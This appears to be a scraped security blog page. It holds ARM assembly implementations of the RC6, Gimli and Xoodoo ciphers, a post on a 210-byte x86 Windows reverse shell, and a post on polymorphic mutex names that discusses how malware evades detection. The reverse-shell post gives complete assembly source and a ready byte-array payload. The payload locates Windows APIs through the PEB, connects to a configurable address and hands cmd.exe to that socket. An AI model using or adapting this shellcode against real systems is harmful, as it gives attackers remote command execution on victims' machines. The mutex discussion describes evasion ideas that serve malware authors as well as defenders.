  str    x0, [S, i, lsl #2]   // S[i] = x0;  
  bne    init_sub             // i>=0
  
  umull  x0, x1, i, i         // x0 = 0, x1 = 0 
  mov    r, #132              // r = (RC6_KR*3)
  
  // ***********************************************
  // create the round keys
  // *********************************************** 
  mov    j, i                 // j = 0   
rc6_sub:
  cmp    i, #44               // if (i == RC6_KR)
  moveq  i, #0                // i = 0
  and    j, #7                // j &= 7

  // x0 = S[i] = ROTL32(S[i] + x0+x1, 3);
  add    x0, x1               // x0 = x0 + x1;
  ldr    t0, [S, i, lsl #2]
  add    x0, t0               // x0 += t0
  ror    x0, #29 
  str    x0, [S, i, lsl #2]   // S[i] = x0
    
  // x1 = L[j] = ROTL32(L[j] + x0+x1, x0+x1);
  add    x1, x0, x1           // x1 = x0 + x1
  rsb    t0, x1, #32          // t0 = 32 - x1  
  ldr    t1, [L, j, lsl #2]
  add    x1, t1               // x1 += t1
  ror    x1, t0               //
  str    x1, [L, j, lsl #2]   // L[j] = x1  
  add    i, #1                // i++   
  add    j, #1                // j++ 
  subs   r, #1                // r--
  bne    rc6_sub
  
  // ***********************************************
  // perform encryption
  // ***********************************************  
  // load plaintext
  ldm    x, {x0, x1, x2, x3}  // x0 = x[0]; x1 = x[1]; 
                              // x2 = x[2]; x3 = x[3];
  ldr    t0, [kp], #4
  add    x1, t0               // x1 += *kp++;
  
  ldr    t0, [kp], #4
  add    x3, t0               // x3 += *kp++;
  
  // apply encryption
  mov    i, #20               // i = RC6_ROUNDS
rc6_enc:
  // mov    t1, #1
  // t0 = ROTL32(x1 * (x1 + x1 + 1), 5);
  // add    t1, t1, x3, lsl #1
  add    t0, x1, x1
  add    t0, #1
  mul    t0, x1, t0
  ror    t0, #27

  // t1 = ROTL32(x3 * (x3 + x3 + 1), 5);
  // add    t1, t1, x3, lsl #1
  add    t1, x3, x3
  add    t1, #1  
  mul    t1, x3, t1
  ror    t1, #27
  
  mov    t2, x3               // backup x3
  
  eor    x0, t0               // x0 ^= t0;
  eor    x2, t1               // x2 ^= t1;  
  
  // x3 = ROTL32(x0 ^ t0, t1) + *kp++;
  rsb    t1, #32              // t1 = 32 - t1
  ror    x0, t1
  ldr    t1, [kp], #4         // t1 = *kp++
  add    x3, x0, t1           // x3 = ROTL32(x0, t1) + *kp++
  
  mov    x0, x1               // move x1 into x0
  
  // x1 = ROTL32(x2 ^ t1, t0) + *kp++;
  rsb    t0, #32              // t0 = 32 - t0
  ror    x2, t0
  ldr    t1, [kp], #4         // t1 = *kp++
  add    x1, x2, t1           // x1 = ROTL32(x2, t0) + *kp++
  
  mov    x2, t2               // move x3 into x2
  
  subs   i, #1                // i--
  bne    rc6_enc              // i>0  
  
  // save ciphertext
  ldr    t0, [kp], #4         // x0 += *kp++;
  add    x0, t0
  
  ldr    t0, [kp], #4         // x2 += *kp++;
  add    x2, t0
  
  stm    x, {x0, x1, x2, x3}  // x[0] = x0; x[1] = x1;
                              // x[2] = x2; x[3] = x3;
  // release memory
  add    sp, #256
  
  // restore registers
  pop    {r0-r12, pc}

Permutation Functions

  • Gimli

Gimli, named after the Lord Of The Rings character, is a 384-bit permutation function, designed specifically to be lightweight, high performance, and secure across multiple architectures.

void gimli(void *state)
{
  int      r, j;
  uint32_t t, x, y, z;
  uint32_t *s=(uint32_t*)state;

  for (r=24; r>0; --r) {
    // apply SP-box
    for (j=0; j<4; j++) {
      x = ROTR32(s[    j],  8);
      y = ROTR32(s[4 + j], 23);
      z =        s[8 + j];

      s[8 + j] = x ^ (z << 1) ^ ((y & z) << 2);
      s[4 + j] = y ^ x        ^ ((x | z) << 1);
      s[j]     = z ^ y        ^ ((x & y) << 3);
    }

    // apply Linear layer
    t = r & 3;

    // if zero, do small swap
    if (t == 0) {
      XCHG(s[0], s[1]);
      XCHG(s[2], s[3]);

      // add constant
      s[0] ^= (0x9e377900 | r);
    }
    // if 2, do big swap
    if (t == 2) {
      XCHG(s[0], s[2]);
      XCHG(s[1], s[3]);
    }
  }
}

The difference with assembly and C is that the state is denoted as x instead of s.

Implementing the swap was a problem. ARM doesn’t have an XCHG instruction like x86, so I thought of a few ways it could be done..

// XOR swap
  cmp         r1, r2   // a == b
  eorne       r1, r2   // a ^= b
  eorne       r2, r1   // b ^= a
  eorne       r1, r2   // a ^= b
// Pushing/popping registers is a viable option.
  push        {r1}
  mov         r1, r2
  pop         {r2}
// Using the load/store instructions
  ldr         r1, [r0]
  ldr         r2, [r0, #4]
  str         r2, [r0]
  str         r1, [r0, #4]
// double load and store
  ldrd        r2, r3, [r0]
  strd        r3, r2, [r0]

For now, it uses a temporary register which will do for now.

s   .req r0

// state
x0  .req r1
x1  .req r2
x2  .req r3
x3  .req r4 

// loop counters
r   .req r5
c   .req r6
j   .req r7

// used during permutation
x   .req r8
y   .req r9
z   .req r10

// temporary registers
t0  .req r11
t1  .req r12

gimlix:
  // save registers
  push   {r0-r12, lr}
  
  mov    r, #24              // r = 24
  ldr    c, =#0x9e377900     // c = 0x9e377900; 
gimli_main:
  mov    j, #4               // j = 4
  sub    x0, s, #4           // x0 = s - 1
gimli_perm: 
  ldr    x, [x0, #4]         // x = ROTR32(s[j],  8);
  ror    x, #8
  
  ldr    y, [x0, #20]        // y = ROTR32(s[4 + j], 23);
  ror    y, #23
  
  ldr    z, [x0, #36]        // z = s[8 + j];
  
  // s[8 + j] = x ^ (z << 1) ^ ((y & z) << 2);
  eor    t0, x, z, lsl #1    // t0 = x ^ (z << 1)
  and    t1, y, z            // t1 = y & z
  eor    t0, t1, lsl #2      // t0 = t0 ^ (t1 << 2)
  str    t0, [x0, #36]       // s[8 + j] = t0
  
  // s[4 + j] = y ^ x ^ ((x | z) << 1);
  eor    t0, y, x            // t0 = y ^ x
  orr    t1, x, z            // t1 = x | z       
  eor    t0, t1, lsl #1      // t0 = t0 ^ (t1 << 1)
  str    t0, [x0, #20]       // s[4 + j] = t0 
  
  // s[j] = z ^ y ^ ((x & y) << 3);
  eor    t0, z, y            // t0 = z ^ y
  and    t1, x, y            // t1 = x & y
  eor    t0, t1, lsl #3      // t0 = t0 ^ (t1 << 3)
  str    t0, [x0, #4]!       // s[j] = t0, s++
  
  subs   j, #1               // j--
  bne    gimli_perm          // j>0
  
  // load 16 bytes of state
  ldm    s, {x0, x1, x2, x3}
  
  // apply linear layer
  // t0 = (r & 3);
  ands   t0, r, #3
  
  // XCHG(s[0], s[1]);
  moveq  t1, x0
  moveq  x0, x1
  moveq  x1, t1
  
  // XCHG(s[2], s[3]);
  moveq  t1, x2
  moveq  x2, x3
  moveq  x3, t1

  // s[0] ^= (0x9e377900 | r);
  orreq  t1, c, r  
  eoreq  x0, t1
    
  // if (t == 2)
  cmp    t0, #2
  
  // XCHG(s[0], s[2]);
  moveq  t1, x0
  moveq  x0, x2
  moveq  x2, t1
  
  // XCHG(s[1], s[3]);
  moveq  t1, x1
  moveq  x1, x3
  moveq  x3, t1
  
  // save state
  stm    s, {x0, x1, x2, x3}
  
  subs   r, #1               // r--
  bne    gimli_main          // r>0
  
  // restore registers
  pop    {r0-r12, pc}
  • Xoodoo

Xoodoo is a new permutation function first described in November 2017. It’s very similar to Keccak, but uses same paramaters as Gimli.

void xoodoo(void *state) {
    uint32_t e[4], x0, x1, x2, t;
    int      r, i;
    uint32_t *x=(uint32_t*)state;

    uint32_t rc[12]=
    { 0x058, 0x038, 0x3c0, 0x0d0,
      0x120, 0x014, 0x060, 0x02c,
      0x380, 0x0f0, 0x1a0, 0x012 };

    // 12 rounds by default
    for (r=0; r<12; r++) {
      // Theta
      for (i=0; i<4; i++) {
        e[i] = ROTR32(x[i] ^ x[i+4] ^ x[i+8], 18);
        e[i]^= ROTR32(e[i], 9);
      }

      for (i=0; i<12; i++) {
        x[i]^= e[(i - 1) & 3];
      }

      // Rho west
      XCHG(x[7], x[4]);
      XCHG(x[7], x[5]);
      XCHG(x[7], x[6]);

      // Iota
      x[0] ^= rc[r];

      // Chi and Rho east
      for (i=0; i<4; i++) {
        x0 = x[i+0];
        x1 = x[i+4];
        x2 = ROTR32(x[i+8], 21);

        x[i+8] = ROTR32((x1 & ~x0) ^ x2, 24);
        x[i+4] = ROTR32((x0 & ~x2) ^ x1, 31);
        x[i+0]^= x2 & ~x1;
      }
      XCHG(x[8], x[10]);
      XCHG(x[9], x[11]);
    }
}

The assembly here is not optimized. It’s a compact implementation for simplicity.

state .req r0
x     .req r1

r     .req r2
i     .req r3

x0    .req r4
x1    .req r5
x2    .req r6
x3    .req r7

rc    .req r8
xt    .req r9

e     .req sp

xoodoo:
    // save registers
    push   {r0-r12, lr}

    mov    r, #12              // 12 rounds
    sub    sp, #16             // allocate 16 bytes
    adr    rc, rc_tab
xoodoo_main:
    mov    i, #0               // i = 0
    mov    x, state
theta_l0:
    ldr    x2, [x, #32]        // x2 = x[i+8]
    ldr    x1, [x, #16]        // x1 = x[i+4]
    ldr    x0, [x], #4         // x0 = x[i+0], advance x by 4

    // e[i] = ROTR32(x[i] ^ x[i+4] ^ x[i+8], 18);
    eor    x0, x1
    eor    x0, x2
    ror    x0, #18

    // e[i]^= ROTR32(e[i], 9);
    eor    x0, x0, ror #9
    str    x0, [sp, i, lsl #2]  // store in e

    add    i, #1               // i++
    cmp    i, #4               // i<4
    bne    theta_l0            //

    // x[i]^= e[(i - 1) & 3];
    mov    i, #0               // i = 0
    mov    x, state            // x = state
theta_l1:
    sub    xt, i, #1
    and    xt, #3               // xt = i & 3
    ldr    xt, [sp, xt, lsl #2] // xt = e[(i - 1) & 3]
    ldr    x0, [x, i, lsl #2]   // x0 = x[i]
    eor    x0, xt               // x0 ^= xt
    str    x0, [x, i, lsl #2]   // x[i] = x0
    add    i, #1                // i++
    cmp    i, #12               // i<12
    bne    theta_l1

    // Rho west
    // XCHG(x[7], x[4]);
    // XCHG(x[7], x[5]);
    // XCHG(x[7], x[6]);
    add    x, state, #16       // x = &state[4]
    ldm    x, {x0, x1, x2, x3}
    mov    xt, x0              // xt = x[4]
    mov    x0, x3              // x[4] = x[7]
    mov    x3, x2              // x[7] = x[6]
    mov    x2, x1              // x[6] = x[5]
    mov    x1, xt              // x[5] = xt
    stm    x, {x0, x1, x2, x3}

    mov    x, state

    // Iota
    // x[0] ^= rc[r];
    ldrh   xt, [rc], #2        // load half-word, advance by 2
    ldr    x0, [x]             // load word
    eor    x0, xt              // xor
    str    x0, [x]             // store word

    mov    i, #4
chi:
    // Chi and Rho east
    // x0 = x[i+0];
    ldr    x0, [x]

    // x1 = x[i+4];
    ldr    x1, [x, #16]

    // x2 = ROTR32(x[i+8], 21);
    ldr    x2, [x, #32]
    ror    x2, #21

    // x[i+8] = ROTR32((x1 & ~x0) ^ x2, 24);
    bic    xt, x1, x0
    eor    xt, x2
    ror    xt, #24
    str    xt, [x, #32]

    // x[i+4] = ROTR32((x0 & ~x2) ^ x1, 31);
    bic    xt, x0, x2
    eor    xt, x1
    ror    xt, #31
    str    xt, [x, #16]

    // x[i+0]^= x2 & ~x1;
    bic    xt, x2, x1
    eor    xt, x0
    str    xt, [x], #4

    // i--
    subs   i, #1
    bne    chi

    add    x, state, #32       // x = &state[8]

    // XCHG(x[8], x[10]);
    ldm    x, {x0, x1, x2, x3}
    push   {x0}
    mov    x0, x2
    pop    {x2}

    // XCHG(x[9], x[11]);
    push   {x1}
    mov    x1, x3
    pop    {x3}
    stm    x, {x0, x1, x2, x3}

    subs   r, #1               // r--
    bne    xoodoo_main         // r>0

    // release stack
    add    sp, #16

    // restore registers, and return
    pop    {r0-r12, pc}

    // round constants
rc_tab:
    .hword 0x058, 0x038, 0x3c0, 0x0d0
    .hword 0x120, 0x014, 0x060, 0x02c
    .hword 0x380, 0x0f0, 0x1a0, 0x012

Summary

You can accelerate your own learning of a CPU language by using a C compiler to generate assembly. The optimizer probably isn’t as good as the one for x86, but you’ll still learn a lot from them.

Sources to all algorithms mentioned can be found here.

If you have comments, requests, my e-mail can be found here

Advertisements
Posted in arm, assembly, cryptography, encryption, linux, programming, raspberry | Tagged , , , , , , , , , , , | Leave a comment

Shellcode: A Tweetable Reverse Shell for x86 Windows

Introduction

Since being granted a 280 character limit, many twitter users have been embedding all kinds of code into a single message. This will be a quick post showing a tweetable reverse shell for x86 windows. You’ll have to forgive me for writing about boring shellcodes again, I have nothing else to write about 😛

Payload generators seem unable to produce a reverse shell equal to or less than 210 bytes which is required before conversion to base64. The code here has been written mostly from scratch, but obviously not without influence from existing shellcodes that featured nice ideas.

There are 3 in particular I took ideas from. Not all of the code is entirely necessary, but I wanted the final code to be somewhat stable. In the end, I had to remove code to gracefully exit, so once the cmd process ends, it takes the host process with it…

Moreover, this code is unlikely to run smoothly on all versions of Windows due to elimination of code that would make it work. If you can optimize it further, I’m sure you can get it to work on all versions of windows.

Recycling ideas

The following codes were useful for writing the tweetable version.

Year Author Description
2007 weiss Traverses the PEB DLL list, and initializes all parameters before calling API, the latter of which seems to be inspired by rgb/29a viruses.
2008 weiss A function to resolve and invoke an API is kept separate from all other code. It jumps directly to the API address once found and then returns to the caller.
2009 Stephen Fewer Provides additional hashing of DLL name from PEB

Here’s the source code which can be assembled using YASM or NASM.

; 210 byte reverse shell for x86 windows
; odzhan
    bits   32

struc pushad_t
  _edi resd 1
  _esi resd 1
  _ebp resd 1
  _esp resd 1
  _ebx resd 1
  _edx resd 1
  _ecx resd 1
  _eax resd 1
  .size:
endstruc

      bits   32

      xor    eax, eax
      call   init_api_disp  ; load the API dispatcher
api_hash:      
      dd     0xDF6D65D1     ; WS2_32.dll   + WSASocketA    
      db     'cmd',0h    
      dd     0D2040002h     ; sa.sin_port = htons(1234)
      dd     00100007Fh     ; sa.sin_addr = inet_addr("127.0.0.1")
      dd     0xA324AC0C     ; WS2_32.dll   + connect
      dd     0x611AD39B     ; KERNEL32.dll + CreateProcessA
      dd     0x607F058C     ; KERNEL32.dll + WaitForSingleObject
      ;dd     0x467EDD8B     ; ntdll.dll    + RtlExitUserThread
api_disp: 
      lodsd                 ; eax = hash to find
      pushad                ; saves api hash on stack
      xor    eax, eax
      mov    eax, [fs:eax+30h]  ; eax = (PPEB) __readfsdword(0x30);
      mov    eax, [eax+0ch] ; eax = (PPEB_LDR_DATA)peb->Ldr
      mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
      jmp    get_dll
next_dll:    
      mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
get_dll:
      mov    ebx, [edi+18h] ; ebx = dte->DllBase
      ; eax = IMAGE_DOS_HEADER.e_lfanew
      mov    eax, [ebx+3ch]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+78h]
      jecxz  next_dll
      ; esi = hash_dll(IMAGE_EXPORT_DIRECTORY.Name)
      mov    esi, [ebx+ecx+0ch]
      add    esi, ebx
      xor    eax, eax
      cdq
hash_dll:
      lodsb
      add    edx, eax ;  h += *s++
      rol    edx, 13  ;  h = ROTL32(h, 13) 
      dec    eax
      jns    hash_dll
      mov    ebp, edx
      
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+18h]
      lodsd
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      push   edi             ; save edi
      ; save IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      lodsd
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      push   eax             ; save address of functions
      ; edi = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      xchg   eax, edi        ; swap(eax, edi)
      ; save IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
      lodsd
      add    eax, ebx        ; eax = RVA(eax, ebx)
      push   eax             ; save address of name ordinals
get_name:
      mov    esi, [edi+4*ecx-4] ; esi = RVA of API string
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; zero eax
      cdq                       ; h = 0
hash_name:    
      lodsb
      add    edx, eax
      rol    edx, 13
      dec    eax
      jns    hash_name
      add    edx, ebp           ; add hash of DLL string  
      cmp    edx, [esp+_eax+12] ; hashes match?
      loopne get_name           ; --ecx && edx != hash
      pop    edx                ; edx = AddressOfNameOrdinals
      pop    esi                ; esi = AddressOfFunctions
      pop    edi                ; restore DLL entry
      jne    next_dll           ; get next DLL        
      movzx  eax, word [edx+2*ecx] ; eax = AddressOfNameOrdinals[eax]
      add    ebx, [esi+4*eax] ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      jmp    eax                   ; jmp to api address
    
init_api_disp:        
      pop    esi                   ; esi = api parameters
      lea    ebp, [esi+(api_disp - api_hash)]
      
      ; edi = alloc(124);    
      push   124
      pop    ecx
      sub    esp, ecx
      mov    edi, esp
      rep    stosb

      ; WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0);
      push   1
      push   2
      call   ebp

      ; CreateProcess(NULL, "cmd", NULL, NULL, 
      ;   TRUE, 0, NULL, NULL, &si, &pi);
      mov    ebx, esp       ; ebx = &si
      lea    edi, [ebx+38h] ; edi = &si.hStdInput
      inc    dword[ebx+2dh] ; si.dwFlags = STARTF_USESTDHANDLES
      stosd                 ; si.hStdInput  = s;
      stosd                 ; si.hStdOutput = s;
      stosd                 ; si.hStdError  = s;
      cdq      
      push   edi            ; lpProcessInformation = &pi
      push   ebx            ; lpStartupInfo = &si      
      push   edx            ; lpCurrentDirectory = NULL
      push   edx            ; lpEnvironment = NULL
      push   edx            ; dwCreationFlags = 0
      push   eax            ; bInheritHandles = TRUE
      push   edx            ; lpThreadAttributes = NULL
      push   edx            ; lpProcessAttributes = NULL
      push   esi            ; lpCommandLine = "cmd", 0
      push   edx            ; lpApplicationName = NULL
      xchg   ebx, eax
      lodsd
      ; connect(s, &sa, sizeof(sa));
      push   10h            ; sizeof(sa)
      push   esi            ; &sa
      push   ebx            ; s
      lodsd                 ; skip &sa
      lodsd
      call   ebp            ; connect
      call   ebp            ; CreateProcessA

      ; WaitForSingleObject(pi.hProcess, INFINITE);
      push   -1
      push   dword [edi]
      call   ebp   
      
      ; RtlExitUserThread();
      ; call   ebp

Here’s a C string…don’t forget it uses 127.0.0.1 port 1234 for the network address.

#define RS2_SIZE 210

char RS2[] = {
  /* 0000 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0002 */ "\xe8\x90\x00\x00\x00"     /* call 0x97                   */
  /* 0007 */ "\xd1\x65\x6d"             /* shl dword [ebp+0x6d], 1     */
  /* 000A */ "\xdf\x63\x6d"             /* fbld tword [ebx+0x6d]       */
  /* 000D */ "\x64\x00\x02"             /* add [fs:edx], al            */
  /* 0010 */ "\x00\x04\xd2"             /* add [edx+edx*8], al         */
  /* 0013 */ "\x7f\x00"                 /* jg 0x15                     */
  /* 0015 */ "\x00\x01"                 /* add [ecx], al               */
  /* 0017 */ "\x0c\xac"                 /* or al, 0xac                 */
  /* 0019 */ "\x24\xa3"                 /* and al, 0xa3                */
  /* 001B */ "\x9b"                     /* wait                        */
  /* 001C */ "\xd3\x1a"                 /* rcr dword [edx], cl         */
  /* 001E */ "\x61"                     /* popad                       */
  /* 001F */ "\x8c\x05\x7f\x60\xad\x60" /* mov [0x60ad607f], es        */
  /* 0025 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0027 */ "\x64\x8b\x40\x30"         /* mov eax, [fs:eax+0x30]      */
  /* 002B */ "\x8b\x40\x0c"             /* mov eax, [eax+0xc]          */
  /* 002E */ "\x8b\x78\x0c"             /* mov edi, [eax+0xc]          */
  /* 0031 */ "\xeb\x02"                 /* jmp 0x35                    */
  /* 0033 */ "\x8b\x3f"                 /* mov edi, [edi]              */
  /* 0035 */ "\x8b\x5f\x18"             /* mov ebx, [edi+0x18]         */
  /* 0038 */ "\x8b\x43\x3c"             /* mov eax, [ebx+0x3c]         */
  /* 003B */ "\x8b\x4c\x03\x78"         /* mov ecx, [ebx+eax+0x78]     */
  /* 003F */ "\xe3\xf2"                 /* jecxz 0x33                  */
  /* 0041 */ "\x8b\x74\x0b\x0c"         /* mov esi, [ebx+ecx+0xc]      */
  /* 0045 */ "\x01\xde"                 /* add esi, ebx                */
  /* 0047 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0049 */ "\x99"                     /* cdq                         */
  /* 004A */ "\xac"                     /* lodsb                       */
  /* 004B */ "\x01\xc2"                 /* add edx, eax                */
  /* 004D */ "\xc1\xc2\x0d"             /* rol edx, 0xd                */
  /* 0050 */ "\x48"                     /* dec eax                     */
  /* 0051 */ "\x79\xf7"                 /* jns 0x4a                    */
  /* 0053 */ "\x89\xd5"                 /* mov ebp, edx                */
  /* 0055 */ "\x8d\x74\x0b\x18"         /* lea esi, [ebx+ecx+0x18]     */
  /* 0059 */ "\xad"                     /* lodsd                       */
  /* 005A */ "\x91"                     /* xchg ecx, eax               */
  /* 005B */ "\xe3\xd6"                 /* jecxz 0x33                  */
  /* 005D */ "\x57"                     /* push edi                    */
  /* 005E */ "\xad"                     /* lodsd                       */
  /* 005F */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0061 */ "\x50"                     /* push eax                    */
  /* 0062 */ "\xad"                     /* lodsd                       */
  /* 0063 */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0065 */ "\x97"                     /* xchg edi, eax               */
  /* 0066 */ "\xad"                     /* lodsd                       */
  /* 0067 */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0069 */ "\x50"                     /* push eax                    */
  /* 006A */ "\x8b\x74\x8f\xfc"         /* mov esi, [edi+ecx*4-0x4]    */
  /* 006E */ "\x01\xde"                 /* add esi, ebx                */
  /* 0070 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0072 */ "\x99"                     /* cdq                         */
  /* 0073 */ "\xac"                     /* lodsb                       */
  /* 0074 */ "\x01\xc2"                 /* add edx, eax                */
  /* 0076 */ "\xc1\xc2\x0d"             /* rol edx, 0xd                */
  /* 0079 */ "\x48"                     /* dec eax                     */
  /* 007A */ "\x79\xf7"                 /* jns 0x73                    */
  /* 007C */ "\x01\xea"                 /* add edx, ebp                */
  /* 007E */ "\x3b\x54\x24\x28"         /* cmp edx, [esp+0x28]         */
  /* 0082 */ "\xe0\xe6"                 /* loopne 0x6a                 */
  /* 0084 */ "\x5a"                     /* pop edx                     */
  /* 0085 */ "\x5e"                     /* pop esi                     */
  /* 0086 */ "\x5f"                     /* pop edi                     */
  /* 0087 */ "\x75\xaa"                 /* jnz 0x33                    */
  /* 0089 */ "\x0f\xb7\x04\x4a"         /* movzx eax, word [edx+ecx*2] */
  /* 008D */ "\x03\x1c\x86"             /* add ebx, [esi+eax*4]        */
  /* 0090 */ "\x89\x5c\x24\x1c"         /* mov [esp+0x1c], ebx         */
  /* 0094 */ "\x61"                     /* popad                       */
  /* 0095 */ "\xff\xe0"                 /* jmp eax                     */
  /* 0097 */ "\x5e"                     /* pop esi                     */
  /* 0098 */ "\x8d\x6e\x1c"             /* lea ebp, [esi+0x1c]         */
  /* 009B */ "\x6a\x7c"                 /* push 0x7c                   */
  /* 009D */ "\x59"                     /* pop ecx                     */
  /* 009E */ "\x29\xcc"                 /* sub esp, ecx                */
  /* 00A0 */ "\x89\xe7"                 /* mov edi, esp                */
  /* 00A2 */ "\xf3\xaa"                 /* rep stosb                   */
  /* 00A4 */ "\x6a\x01"                 /* push 0x1                    */
  /* 00A6 */ "\x6a\x02"                 /* push 0x2                    */
  /* 00A8 */ "\xff\xd5"                 /* call ebp                    */
  /* 00AA */ "\x89\xe3"                 /* mov ebx, esp                */
  /* 00AC */ "\x8d\x7b\x38"             /* lea edi, [ebx+0x38]         */
  /* 00AF */ "\xff\x43\x2d"             /* inc dword [ebx+0x2d]        */
  /* 00B2 */ "\xab"                     /* stosd                       */
  /* 00B3 */ "\xab"                     /* stosd                       */
  /* 00B4 */ "\xab"                     /* stosd                       */
  /* 00B5 */ "\x99"                     /* cdq                         */
  /* 00B6 */ "\x57"                     /* push edi                    */
  /* 00B7 */ "\x53"                     /* push ebx                    */
  /* 00B8 */ "\x52"                     /* push edx                    */
  /* 00B9 */ "\x52"                     /* push edx                    */
  /* 00BA */ "\x52"                     /* push edx                    */
  /* 00BB */ "\x50"                     /* push eax                    */
  /* 00BC */ "\x52"                     /* push edx                    */
  /* 00BD */ "\x52"                     /* push edx                    */
  /* 00BE */ "\x56"                     /* push esi                    */
  /* 00BF */ "\x52"                     /* push edx                    */
  /* 00C0 */ "\x93"                     /* xchg ebx, eax               */
  /* 00C1 */ "\xad"                     /* lodsd                       */
  /* 00C2 */ "\x6a\x10"                 /* push 0x10                   */
  /* 00C4 */ "\x56"                     /* push esi                    */
  /* 00C5 */ "\x53"                     /* push ebx                    */
  /* 00C6 */ "\xad"                     /* lodsd                       */
  /* 00C7 */ "\xad"                     /* lodsd                       */
  /* 00C8 */ "\xff\xd5"                 /* call ebp                    */
  /* 00CA */ "\xff\xd5"                 /* call ebp                    */
  /* 00CC */ "\x6a\xff"                 /* push 0xffffffff             */
  /* 00CE */ "\xff\x37"                 /* push dword [edi]            */
  /* 00D0 */ "\xff\xd5"                 /* call ebp                    */
};

Testing

It was tested in a 32-bit process (Wow64) running on 64-bit versions of Windows 7 and 10. It’s unlikely to run on Windows NT. I’m already aware of all the potential problems running this code, so save your breath my friend 🙂 It was written for fun, and nothing more.

View source here

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | Leave a comment

Polymorphic Mutex Names

Introduction

Perhaps there was never any legitimate reason to use Polymorphic Mutex Names, so it’s understandable many developers never provided a solution.

It could be argued, poly mutexes serve only as a way for malicious applications to evade detection. On the other hand, they could potentially be used to defend applications from Denial of Service (DoS) attacks or termination by a malicious application.

Many developers use named mutexes to avoid multiple instances of their application running. The problem is that applications using this technique are also vulnerable to Denial of Service attacks.

First, some defintions…

Named Mutex

A mutual exclusion (mutex) is a program object that allows multiple program threads to share the same resource, but not simultaneously. Global Named Mutexes can be created to avoid multiple instances of the same application running on a system.

How to limit 32-bit applications to one instance in Visual C++ explains how to do this.

The following snippet of code is very common.

int WINAPI WinMain(...)
{
   const char szUniqueNamedMutex[] = "com_mycompany_apps_appname";
   HANDLE hHandle = CreateMutex( NULL, TRUE, szUniqueNamedMutex );
   if( ERROR_ALREADY_EXISTS == GetLastError() )
   {
      // Program already running somewhere
      return(1); // Exit program
   }

   // Program runs...

   // Upon app closing:
   ReleaseMutex( hHandle ); // Explicitly release mutex
   CloseHandle( hHandle ); // close handle before terminating
   return( 1 );
}

The problem with this example is when an entirely different application either intentionally or unintentionally creates a mutex of the same name. In this case: com_mycompany_apps_appname

In the remarks section for the CreateMutex API, it states the following.

If you are using a named mutex to limit your application to a single instance, a malicious user can create this mutex before you do and prevent your application from starting. To prevent this situation, create a randomly named mutex and store the name so that it can only be obtained by an authorized user. Alternatively, you can use a file for this purpose. To limit your application to one instance per user, create a locked file in the user’s profile directory.

Raymond Chen covers the topic in A single-instance program is its own denial of service

A discussion on stack exchange and another in Multiple program instance prevention in C suggest possible ways to avoid Denial of Service conditions.

Polymorphic Code

Uses a Disassembly Engine (DE) to rewrite instructions while retaining the original algorithm. The code changes itself each time it runs, but functionality of the code will remain the same.

Imagine setting the EAX register of an x86 CPU to zero. Each of the following instructions accomplish this, but they certainly appear different, don’t they?

"\x31\xc0"                 /* xor  eax, eax             */

"\x29\xc0"                 /* sub  eax, eax             */

"\xb8\x00\x00\x00\x00"     /* mov  eax, 0               */

"\x8d\x05\x00\x00\x00\x00" /* lea  eax, [0]             */

"\x83\xe0\x00"             /* and  eax, 0               */

"\x6a\x00"                 /* push 0                    */
"\x58"                     /* pop  eax                  */

"\x6b\xc0\x00"             /* imul eax, eax, 0          */

Malware Evasion Techniques

It was a blog post by the Talos Group titled “Cyber Conflict” Decoy Document Used In Real Cyber Conflict which reminded me of how malware continues to use named mutexes to prevent multiple instances of the same code running simultaneously.

This malware in particular decodes a mutex name at runtime in order to evade detection by string. Here you see the mutex name in its decoded state. That is, after it’s been deobfuscated using an XOR operation.

Talos go on to say: the actor changed the XOR key and the MUTEX name. We assume that these modifications were performed in order to avoid detection based on public IOCs.

Indicators of Compromise (IOC) is something that can be used to identify an attack, such as a Mutex name.

@osxreverser joked about the concept of polymorphic mutex names back in July. Since a polymorphic mutex name would always be different, the assumption is that it would be ineffective as a way to prevent multiple instances running.

Are polymorphic mutex names possible? Yes, they are.
Do they have a legitimate purpose? Potentially, yes.

Some searching online lead me to the following question at stack overflow which was posted in 2012.

Can a polymorphic/metamorphic worm use (the same) mutex? This would solve the problem of grinding the network into the ground and consuming all resources with multiple instances of the worm….

The answer which was accepted:

Short answer: no.

The point of polymorphic malware is to have no identifiable pattern. …. To know the name of the mutex, there must be a pattern to it. If there’s a pattern to it, the AV can use that pattern to detect the malware.

However, this answer is not entirely true…

The general consensus is that poly mutex names aren’t possible.

A proposal to generate Mutex Revocation List (MRL) is discussed in What if we had mutex revocation lists?

As the malware authors use these markers to check if they have already infected a specific machine, the mutex names can’t be truly random.

No, they can’t be truly random, but they can be more difficult to detect.

Using encryption

To the best of my knowledge, the first documented example of malware using encryption algorithms to derive mutex names was demonstrated in the TreasureHunter malware.

How Malware Generates Mutex Names to Evade Detection discuses how the TreasureHunter malware derives an MD5 hash of the Windows Product ID before using this as the global mutex name. This prevents more than one instance of the application running while simultaneously evading detection via string matching.

Loki-Bot does something similar using the MachineGUID from the Windows registry.

For more information, see Looking at Mutex Objects for Malware Discovery and Indicators of Compromise

Although the above methods don’t generate polymorphic names, only entropy and additional code to enumerate mutexes are missing.

So what kinds of crypto can be used to generate poly mutex names?

  • Key derivation function (KDF)
  • Use a password hashing algorithm along with nonce to create unique output.

  • Symmetric Encryption
